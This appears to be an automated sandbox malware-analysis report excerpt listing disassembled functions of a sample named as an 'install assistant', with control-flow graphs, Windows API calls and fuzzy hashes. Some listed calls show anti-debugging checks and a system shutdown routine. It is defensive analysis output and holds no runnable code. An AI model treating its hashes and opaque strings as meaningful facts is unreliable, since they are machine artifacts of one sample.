                                • Instruction ID: ec94aeb8f6131d414875486d70471e824ff7ee79c4f20d4cd98b132506c990b6
                                • Opcode Fuzzy Hash: 47a70539484ea61a4517adfb9bcce3fb8496d2cf7f5a9e89d9e364f183d6797c
                                • Instruction Fuzzy Hash: C831E170A093808FD740DF28D19872EBBF0AB9A358F405A1DF8D997250E7B595888F47

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7587 6ca1bc5e-6ca1bc7a 7588 6ca1bc80-6ca1bc82 7587->7588 7589 6ca1be39 7587->7589 7590 6ca1bca4-6ca1bcc5 7588->7590 7591 6ca1bc84-6ca1bc97 call 6ca0f9df call 6ca0f9cc call 6ca10120 7588->7591 7592 6ca1be3b-6ca1be3f 7589->7592 7593 6ca1bcc7-6ca1bcca 7590->7593 7594 6ca1bccc-6ca1bcd2 7590->7594 7607 6ca1bc9c-6ca1bc9f 7591->7607 7593->7594 7596 6ca1bcd4-6ca1bcd9 7593->7596 7594->7591 7594->7596 7598 6ca1bcdb-6ca1bce7 call 6ca1ac69 7596->7598 7599 6ca1bcea-6ca1bcfb call 6ca1be40 7596->7599 7598->7599 7608 6ca1bcfd-6ca1bcff 7599->7608 7609 6ca1bd3c-6ca1bd4e 7599->7609 7607->7592 7612 6ca1bd01-6ca1bd09 7608->7612 7613 6ca1bd26-6ca1bd32 call 6ca1beb1 7608->7613 7610 6ca1bd50-6ca1bd59 7609->7610 7611 6ca1bd95-6ca1bdb7 WriteFile 7609->7611 7617 6ca1bd85-6ca1bd93 call 6ca1c2c3 7610->7617 7618 6ca1bd5b-6ca1bd5e 7610->7618 7614 6ca1bdc2 7611->7614 7615 6ca1bdb9-6ca1bdbf GetLastError 7611->7615 7619 6ca1bdcb-6ca1bdce 7612->7619 7620 6ca1bd0f-6ca1bd1c call 6ca1c25b 7612->7620 7621 6ca1bd37-6ca1bd3a 7613->7621 7622 6ca1bdc5-6ca1bdca 7614->7622 7615->7614 7617->7621 7624 6ca1bd60-6ca1bd63 7618->7624 7625 6ca1bd75-6ca1bd83 call 6ca1c487 7618->7625 7623 6ca1bdd1-6ca1bdd6 7619->7623 7629 6ca1bd1f-6ca1bd21 7620->7629 7621->7629 7622->7619 7630 6ca1be34-6ca1be37 7623->7630 7631 6ca1bdd8-6ca1bddd 7623->7631 7624->7623 7632 6ca1bd65-6ca1bd73 call 6ca1c39e 7624->7632 7625->7621 7629->7622 7630->7592 7635 6ca1be09-6ca1be15 7631->7635 7636 6ca1bddf-6ca1bde4 7631->7636 7632->7621 7639 6ca1be17-6ca1be1a 7635->7639 7640 6ca1be1c-6ca1be2f call 6ca0f9cc call 6ca0f9df 7635->7640 7641 6ca1bde6-6ca1bdf8 call 6ca0f9cc call 6ca0f9df 7636->7641 7642 6ca1bdfd-6ca1be04 call 6ca0f9f2 7636->7642 7639->7589 7639->7640 7640->7607 7641->7607 7642->7607
                                APIs
                                  • Part of subcall function 6CA1BEB1: GetConsoleCP.KERNEL32(?,6CA1B0D0,?), ref: 6CA1BEF9
                                • WriteFile.KERNEL32(?,?,6CA246EC,00000000,00000000,?,00000000,00000000,6CA25AB6,00000000,00000000,?,00000000,6CA1B0D0,6CA246EC,00000000), ref: 6CA1BDAF
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA246EC,6CA1B0D0,00000000,?,?,?,?,00000000,?), ref: 6CA1BDB9
                                • __dosmaperr.LIBCMT ref: 6CA1BDFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                • String ID: 8Q
                                • API String ID: 251514795-4022487301
                                • Opcode ID: 48d5560e506c72cb942cccbc8a91da18a53e4038121e8efaee717f2a854e0426
                                • Instruction ID: 38889e94045f3b42b5209888eba19f80830a927a688b00280d2db8a35bfcbe01
                                • Opcode Fuzzy Hash: 48d5560e506c72cb942cccbc8a91da18a53e4038121e8efaee717f2a854e0426
                                • Instruction Fuzzy Hash: 4A51E7B1A0820AAFDB01DFA4DD40BEEBB79EF0935CF180655D500A7F91D73099C987A5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7654 6ca05b90-6ca05b9c 7655 6ca05bdd 7654->7655 7656 6ca05b9e-6ca05ba9 7654->7656 7659 6ca05bdf-6ca05c57 7655->7659 7657 6ca05bab-6ca05bbd 7656->7657 7658 6ca05bbf-6ca05bcc call 6c8d01f0 call 6ca10b18 7656->7658 7657->7658 7668 6ca05bd1-6ca05bdb 7658->7668 7661 6ca05c83-6ca05c89 7659->7661 7662 6ca05c59-6ca05c81 7659->7662 7662->7661 7664 6ca05c8a-6ca05d49 call 6c8d2250 call 6c8d2340 call 6ca09379 call 6c8ce010 call 6ca07088 7662->7664 7668->7659
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA05D31
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 323602529-1866435925
                                • Opcode ID: da3d2a9667f6710b24ce4241135bbf5e884b647bc97220c6a00ea016a631df73
                                • Instruction ID: 53ca69b36d649831bfcced0a1fff5391abf29ac5bee536a8f2821a80dee38809
                                • Opcode Fuzzy Hash: da3d2a9667f6710b24ce4241135bbf5e884b647bc97220c6a00ea016a631df73
                                • Instruction Fuzzy Hash: 015134B5600B008FD725CF29D595BA7BBF1BB48318F048A2DD8864BB90E775B949CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7699 6ca1b925-6ca1b939 call 6ca215a2 7702 6ca1b93b-6ca1b93d 7699->7702 7703 6ca1b93f-6ca1b947 7699->7703 7704 6ca1b98d-6ca1b9ad call 6ca2171f 7702->7704 7705 6ca1b952-6ca1b955 7703->7705 7706 6ca1b949-6ca1b950 7703->7706 7716 6ca1b9bb 7704->7716 7717 6ca1b9af-6ca1b9b9 call 6ca0f9f2 7704->7717 7709 6ca1b973-6ca1b983 call 6ca215a2 CloseHandle 7705->7709 7710 6ca1b957-6ca1b95b 7705->7710 7706->7705 7708 6ca1b95d-6ca1b971 call 6ca215a2 * 2 7706->7708 7708->7702 7708->7709 7709->7702 7719 6ca1b985-6ca1b98b GetLastError 7709->7719 7710->7708 7710->7709 7721 6ca1b9bd-6ca1b9c0 7716->7721 7717->7721 7719->7704
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,6CA2425F), ref: 6CA1B97B
                                • GetLastError.KERNEL32(?,00000000,?,6CA2425F), ref: 6CA1B985
                                • __dosmaperr.LIBCMT ref: 6CA1B9B0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID:
                                • API String ID: 2583163307-0
                                • Opcode ID: 9adec217edb2228940f5b26e07de8b0414da4ee25b898f2127419a4f79ed9ce5
                                • Instruction ID: daeb94fbb013c1dea2073683fb7e68d3639316389f0dc4267f01ffdcf08a7b9c
                                • Opcode Fuzzy Hash: 9adec217edb2228940f5b26e07de8b0414da4ee25b898f2127419a4f79ed9ce5
                                • Instruction Fuzzy Hash: 2A012533A0D1245AC30806BAA945BAE27654B8373CF2D4349E91687FC0DB66C8CF8254

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7944 6ca10b9c-6ca10ba7 7945 6ca10ba9-6ca10bbc call 6ca0f9cc call 6ca10120 7944->7945 7946 6ca10bbe-6ca10bcb 7944->7946 7958 6ca10c10-6ca10c12 7945->7958 7948 6ca10c06-6ca10c0f call 6ca1ae75 7946->7948 7949 6ca10bcd-6ca10be2 call 6ca10cb9 call 6ca1873e call 6ca19c60 call 6ca1b898 7946->7949 7948->7958 7963 6ca10be7-6ca10bec 7949->7963 7964 6ca10bf3-6ca10bf7 7963->7964 7965 6ca10bee-6ca10bf1 7963->7965 7964->7948 7966 6ca10bf9-6ca10c05 call 6ca147bb 7964->7966 7965->7948 7966->7948
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction ID: 9b484f3bd0a17ce370a71742d1c0dd2037d5f6bd30a3e0bc99505ac5d63baffb
                                • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction Fuzzy Hash: FCF0443650D6506AC7211A3A8F00BCB32A88F823BCF240705E8A093ED0CB70D4DECBE1
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA05AB4
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA05AF4
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID:
                                • API String ID: 323602529-0
                                • Opcode ID: 0c39df1439cd081ea2c7d7ca132015288aacbd9058f2d0035e20f41ac51fe11c
                                • Instruction ID: bccfb90a3757ca2a3171bd1c323ac9b7b9a41cbd423799aaa841e21cc4339b13
                                • Opcode Fuzzy Hash: 0c39df1439cd081ea2c7d7ca132015288aacbd9058f2d0035e20f41ac51fe11c
                                • Instruction Fuzzy Hash: 0B513771201B04DBE725CF29D585BD6BBE4BB04718F448A1CD8AA4BB91DB34F589CB81
                                APIs
                                • GetLastError.KERNEL32(6CA36DD8,0000000C), ref: 6CA0EF52
                                • ExitThread.KERNEL32 ref: 6CA0EF59
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorExitLastThread
                                • String ID:
                                • API String ID: 1611280651-0
                                • Opcode ID: b91602b4f5fc74f775794fcc4240f112a66a9beb13127f1c1d6814af8a6e122d
                                • Instruction ID: ec962c09ef82baca7e48f830fbc2bf09a808852ece7f9c34b714c2316cc65b30
                                • Opcode Fuzzy Hash: b91602b4f5fc74f775794fcc4240f112a66a9beb13127f1c1d6814af8a6e122d
                                • Instruction Fuzzy Hash: 2DF02271B04600AFDF049BB0DA08AAE3B74FF41208F144288E005D7B40CF31A989DBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __wsopen_s
                                • String ID:
                                • API String ID: 3347428461-0
                                • Opcode ID: 5d65fe9bf0f889574d222a93228f0c07100136315165b7948d42d5432830c1e8
                                • Instruction ID: 3c07fd00a585358b8d40a44a788fb17c826e674ff435c310a10cc13601a252fb
                                • Opcode Fuzzy Hash: 5d65fe9bf0f889574d222a93228f0c07100136315165b7948d42d5432830c1e8
                                • Instruction Fuzzy Hash: D2116A71A0420EAFCB05CF59E945A9B3BF8EF49314F054059F808AB311D631E915CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction ID: de3b6e006d118a0012b13e8075f4e17b6685f7454ff4ded43d51e35a99fb8b16
                                • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction Fuzzy Hash: CE014472C05159BFCF019FA89E009EEBFB5AF08254F144165ED24E2650E73586A8DB91
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000000,?,6CA24115,?,?,00000000,?,6CA24115,00000000,0000000C), ref: 6CA24474
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: bdc6e1b82617fbc0059d9bd4f40082bf3ff8552248951cc0abd530110f799b43
                                • Instruction ID: b4617dacbc1486dc1566e0b59215a07f6160f87f8d5fa81aa586a7240792e018
                                • Opcode Fuzzy Hash: bdc6e1b82617fbc0059d9bd4f40082bf3ff8552248951cc0abd530110f799b43
                                • Instruction Fuzzy Hash: 3FD06C3210020DBBDF128E84DC06EDA3FAAFB88714F018000BA1896020C732E862AB90
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction ID: 9e0432732d9306b7026b362bc560c72199869b6746730a18746459bfc169d4c7
                                • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction Fuzzy Hash:
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: g)''
                                • API String ID: 4218353326-3487984327
                                • Opcode ID: fc8a9ef2c2791e5159f26d88f520b958721214bc87db1174a1c9667ca736da62
                                • Instruction ID: 6579c4600557cde86c86ae9eae8193c28c94f94cb2383aeaea8d0adad50bd449
                                • Opcode Fuzzy Hash: fc8a9ef2c2791e5159f26d88f520b958721214bc87db1174a1c9667ca736da62
                                • Instruction Fuzzy Hash: A563DF31745B018FC728CF28D8D0A95B7F2BF95358B1D8A6DC0E64BA55EB74B48ACB40
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 6CA05D6A
                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CA05D76
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CA05D84
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CA05DAB
                                • NtInitiatePowerAction.NTDLL ref: 6CA05DBF
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3256374457-3733053543
                                • Opcode ID: f40a239011a2d12a9632a985e54248354b2cd916425593996f4406245945d445
                                • Instruction ID: ad858b82640fcf0f3c501f45381635f4469cb16ee779d3f88ab00ffbcb3c30f9
                                • Opcode Fuzzy Hash: f40a239011a2d12a9632a985e54248354b2cd916425593996f4406245945d445
                                • Instruction Fuzzy Hash: A5F03070744300BBEA007B24DE0AB5A7BB8EF65705F01455CF945A71D1EBB0A9948B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: \j`7$\j`7$j
                                • API String ID: 0-3644614255
                                • Opcode ID: 5b97f7a1579840c388e30bc743ddc6b1753c0f724605622a5436d9297183f0d0
                                • Instruction ID: 2b216b52aac5a232af1e1ef2e818a15d68a938d63b5863ffbcefb9b17cb64f59
                                • Opcode Fuzzy Hash: 5b97f7a1579840c388e30bc743ddc6b1753c0f724605622a5436d9297183f0d0
                                • Instruction Fuzzy Hash: 9C42347460A3828FCB24CF68C58065ABBE1BBC9354F244E2EE4A5C7B61D774E845CB53
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA66CE5
                                  • Part of subcall function 6CA3CC2A: __EH_prolog.LIBCMT ref: 6CA3CC2F
                                  • Part of subcall function 6CA3E6A6: __EH_prolog.LIBCMT ref: 6CA3E6AB
                                  • Part of subcall function 6CA66A0E: __EH_prolog.LIBCMT ref: 6CA66A13
                                  • Part of subcall function 6CA66837: __EH_prolog.LIBCMT ref: 6CA6683C
                                  • Part of subcall function 6CA6A143: __EH_prolog.LIBCMT ref: 6CA6A148
                                  • Part of subcall function 6CA6A143: ctype.LIBCPMT ref: 6CA6A16C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog$ctype
                                • String ID:
                                • API String ID: 1039218491-3916222277
                                • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                • Instruction ID: 5f421474a41f451a33c560f0cd083ce2ae13312c9af83e700e76d202740a26d4
                                • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                • Instruction Fuzzy Hash: DE03AB308012A8DEDF15CFA5CA54BDCBBB1AF15308F24809AD449A7B91DB346ECDDB61
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6CA10279
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6CA10283
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6CA10290
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 6db8d64b81e4a88736bdd9922e8e21fe67ff2338124ef1b54aafc2653460cbe6
